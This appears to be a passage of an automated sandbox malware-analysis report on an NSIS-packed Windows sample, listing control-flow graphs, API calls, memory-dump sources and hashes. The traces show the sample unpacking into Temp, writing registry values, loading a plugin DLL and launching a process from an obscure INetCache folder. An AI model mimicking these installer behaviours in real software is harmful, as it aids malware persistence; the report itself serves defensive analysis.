                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: "C:\Users\user\Desktop\1ppvR5VRT6.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-2211738972
                              • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                              • Instruction ID: cf48cc2e124a12ae61d5b18fb9546061e9ffe7603c061e2a5f49afbd00461fe6
                              • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                              • Instruction Fuzzy Hash: F3F082363087047BEB108F55DC04B9B7F99DF91750F14803BFA48EA180D6B499648758

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 666 100016bd-100016f9 call 10001a5d 670 1000180a-1000180c 666->670 671 100016ff-10001703 666->671 672 10001705-1000170b call 100021b0 671->672 673 1000170c-10001719 call 100021fa 671->673 672->673 678 10001749-10001750 673->678 679 1000171b-10001720 673->679 680 10001770-10001774 678->680 681 10001752-1000176e call 100023d8 call 10001559 call 10001266 GlobalFree 678->681 682 10001722-10001723 679->682 683 1000173b-1000173e 679->683 687 100017b2-100017b8 call 100023d8 680->687 688 10001776-100017b0 call 10001559 call 100023d8 680->688 704 100017b9-100017bd 681->704 685 10001725-10001726 682->685 686 1000172b-1000172c call 100027e4 682->686 683->678 689 10001740-10001741 call 10002a9f 683->689 692 10001733-10001739 call 10002587 685->692 693 10001728-10001729 685->693 699 10001731 686->699 687->704 688->704 702 10001746 689->702 703 10001748 692->703 693->678 693->686 699->702 702->703 703->678 708 100017fa-10001801 704->708 709 100017bf-100017cd call 1000239e 704->709 708->670 714 10001803-10001804 GlobalFree 708->714 716 100017e5-100017ec 709->716 717 100017cf-100017d2 709->717 714->670 716->708 719 100017ee-100017f9 call 100014e2 716->719 717->716 718 100017d4-100017dc 717->718 718->716 720 100017de-100017df FreeLibrary 718->720 719->708 720->716
                              APIs
                                • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                              • GlobalFree.KERNEL32(00000000), ref: 10001768
                              • FreeLibrary.KERNEL32(?), ref: 100017DF
                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                • Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9
                                • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc$Librarylstrcpy
                              • String ID:
                              • API String ID: 1791698881-3916222277
                              • Opcode ID: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
                              • Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
                              • Opcode Fuzzy Hash: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
                              • Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 723 403146-40316e GetTickCount 724 403174-40319f call 4032c5 SetFilePointer 723->724 725 40329e-4032a6 call 402cf9 723->725 731 4031a4-4031b6 724->731 730 4032a8-4032ac 725->730 732 4031b8 731->732 733 4031ba-4031c8 call 4032af 731->733 732->733 736 403290-403293 733->736 737 4031ce-4031da 733->737 736->730 738 4031e0-4031e6 737->738 739 403211-40322d call 406576 738->739 740 4031e8-4031ee 738->740 746 403299 739->746 747 40322f-403237 739->747 740->739 741 4031f0-403210 call 402cf9 740->741 741->739 748 40329b-40329c 746->748 749 403239-403241 call 405cd9 747->749 750 40325a-403260 747->750 748->730 754 403246-403248 749->754 750->746 752 403262-403264 750->752 752->746 753 403266-403279 752->753 753->731 755 40327f-40328e SetFilePointer 753->755 756 403295-403297 754->756 757 40324a-403256 754->757 755->725 756->748 757->738 758 403258 757->758 758->753
                              APIs
                              • GetTickCount.KERNEL32 ref: 0040315A
                                • Part of subcall function 004032C5: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 0040318D
                              • SetFilePointer.KERNELBASE(004F3006,00000000,00000000,004138D8,00004000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000), ref: 00403288
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FilePointer$CountTick
                              • String ID: 12
                              • API String ID: 1092082344-1227456121
                              • Opcode ID: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
                              • Instruction ID: 532adb213c64d5ab3b143d976f528210e7f95c922d5c949e36f01b9cb200fd6d
                              • Opcode Fuzzy Hash: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
                              • Instruction Fuzzy Hash: FD3160726442049FD710AF6AFE4896A3BECF75435A710827FE904B22F0DB389941DB9D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 759 401c04-401c24 call 402a9f * 2 764 401c30-401c34 759->764 765 401c26-401c2d call 402ac1 759->765 767 401c40-401c46 764->767 768 401c36-401c3d call 402ac1 764->768 765->764 771 401c94-401cba call 402ac1 * 2 FindWindowExA 767->771 772 401c48-401c64 call 402a9f * 2 767->772 768->767 782 401cc0 771->782 783 401c84-401c92 SendMessageA 772->783 784 401c66-401c82 SendMessageTimeoutA 772->784 785 401cc3-401cc6 782->785 783->782 784->785 786 402951-402960 785->786 787 401ccc 785->787 787->786
                              APIs
                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                              • Instruction ID: aed907c05dc833253b389eb1df77c6bfbb772c9e61476b09ce63ef5510084725
                              • Opcode Fuzzy Hash: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                              • Instruction Fuzzy Hash: 46218F71A44209AEEB15DFA5D946AED7BB0EF84304F14803EF505F61D1DA7889408F28
                              APIs
                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskABB0.tmp,00000023,00000011,00000002), ref: 0040241B
                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskABB0.tmp,00000000,00000011,00000002), ref: 00402458
                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskABB0.tmp,00000000,00000011,00000002), ref: 0040253C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseValuelstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\nskABB0.tmp
                              • API String ID: 2655323295-2662097311
                              • Opcode ID: 21db2f8f9692a3377bee1ea49589b4a1eede1b4b6c2deebe6580fb317b003819
                              • Instruction ID: f5012b3eed6b0e10d725da1925ea8f3c2a7a7eca851d842cc00ee1163223ef4a
                              • Opcode Fuzzy Hash: 21db2f8f9692a3377bee1ea49589b4a1eede1b4b6c2deebe6580fb317b003819
                              • Instruction Fuzzy Hash: DA115471E00215BEDF10EFA5DE89A9E7A74EB44754F21403BF508F71D1CAB84D419B29
                              APIs
                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                • Part of subcall function 004051C0: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
                                • Part of subcall function 004051C0: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll), ref: 0040522E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                              • String ID:
                              • API String ID: 2987980305-0
                              • Opcode ID: 88fa0b6539cab5ee48bbf94d2f3b0766d4e8639ddc33a2ee3b91e77515055371
                              • Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
                              • Opcode Fuzzy Hash: 88fa0b6539cab5ee48bbf94d2f3b0766d4e8639ddc33a2ee3b91e77515055371
                              • Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E
                              APIs
                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                              • RegCloseKey.ADVAPI32(?), ref: 00402C22
                              • RegCloseKey.ADVAPI32(?), ref: 00402C43
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Close$Enum
                              • String ID:
                              • API String ID: 464197530-0
                              • Opcode ID: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                              • Instruction ID: a71df8347eb47d58d859942eb4958fb6338d9c628d5ecfe9f9dc7c39a89e9901
                              • Opcode Fuzzy Hash: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                              • Instruction Fuzzy Hash: FA118832504119BBEF01AF91CF09B9E3B79EB04341F104036BA05B50E0E7B4DE61AA68
                              APIs
                                • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0,00000000), ref: 00405AD8
                                • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                • Part of subcall function 00405686: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing,00000000,00000000,000000F0), ref: 0040163C
                              Strings
                              • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing, xrefs: 00401631
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing
                              • API String ID: 1892508949-3807799786
                              • Opcode ID: a1a99da81ec8ebe60bd9a559002f25b092f8fa51d43cb1406a9a8f8e6d1f3ea0
                              • Instruction ID: e80d591928eb94818456189605928617e464058bd7b4ab9a9bc67e70efbf424e
                              • Opcode Fuzzy Hash: a1a99da81ec8ebe60bd9a559002f25b092f8fa51d43cb1406a9a8f8e6d1f3ea0
                              • Instruction Fuzzy Hash: D3112731208151EBCF217BB54D415BF26B0DA92324B28093FE9D1B22E2D63D4D436A3F
                              APIs
                                • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0,00000000), ref: 00405AD8
                                • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                              • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0,00000000), ref: 00405B72
                              • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0), ref: 00405B82
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                              • String ID: C:\
                              • API String ID: 3248276644-3404278061
                              • Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                              • Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
                              • Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                              • Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD
                              APIs
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004061C4,80000002), ref: 00405FC6
                              • RegCloseKey.KERNELBASE(?,?,004061C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll), ref: 00405FD1
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID: Call
                              • API String ID: 3356406503-1824292864
                              • Opcode ID: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
                              • Instruction ID: 18c902175c261954d743b78889848fcc164f2ce977d73a6ea322bbd2e465ffc2
                              • Opcode Fuzzy Hash: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
                              • Instruction Fuzzy Hash: CD01BC7250020AABDF228F20CC09FDB3FA8EF54364F00403AFA05A2190D278CA14DFA8
                              APIs
                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
                              • CloseHandle.KERNEL32(?), ref: 0040576E
                              Strings
                              • Error launching installer, xrefs: 0040574B
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseCreateHandleProcess
                              • String ID: Error launching installer
                              • API String ID: 3712363035-66219284
                              • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                              • Instruction ID: 69b2a91025ee82e0f17d0b644fa8ba69f8cb79a6280e59e5c1840fb2568b3eab
                              • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                              • Instruction Fuzzy Hash: 00E046F0600209BFEB009F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
